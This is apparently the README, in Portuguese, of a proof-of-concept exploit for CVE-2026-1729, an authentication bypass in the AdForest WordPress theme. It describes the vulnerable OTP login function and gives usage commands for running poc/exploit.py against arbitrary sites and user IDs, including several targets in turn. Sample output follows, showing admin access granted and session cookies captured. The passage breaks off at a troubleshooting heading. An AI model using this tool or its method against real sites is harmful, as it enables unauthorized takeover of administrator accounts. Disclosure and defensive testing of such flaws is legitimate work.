
O tema AdForest para WordPress é vulnerável a bypass de autenticação em todas as versões, incluindo a 6.0.12. Isso se deve ao fato de o plugin não verificar corretamente a identidade de um usuário antes de autenticá-lo por meio da função 'sb_login_user_with_otp_fun'. Isso torna possível que atacantes não autenticados façam login, incluindo admin.
Prova de Conceito simples para CVE-2026-1729 (PoC) - Vulnerabilidade de bypass de autenticação no tema AdForest WordPress. Autor: f3ds cr3w est 2oo2 blog
requestspip install requests
python poc/exploit.py https://target-site.com
python poc/exploit.py https://target-site.com --user-id 2
# Explora o admin padrão (ID de usuário 1)
python poc/exploit.py https://example.com
# Explora uma conta de usuário específica
python poc/exploit.py https://example.com --user-id 5
# Testa vários alvos
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3
CVE-2026-1729 - AdForest WordPress Authentication Bypass
=======================================================
WARNING: For authorized testing only!
=======================================================
[+] Target: https://example.com
[+] Targeting user ID: 1
[+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php
[+] SUCCESS! Admin access granted
[+] Admin URL: https://example.com/wp-admin/
[+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Logged in as: admin
🎯 Exploit completed successfully!
You now have admin access to the WordPress site.
/wp-admin/Se o exploit falhar: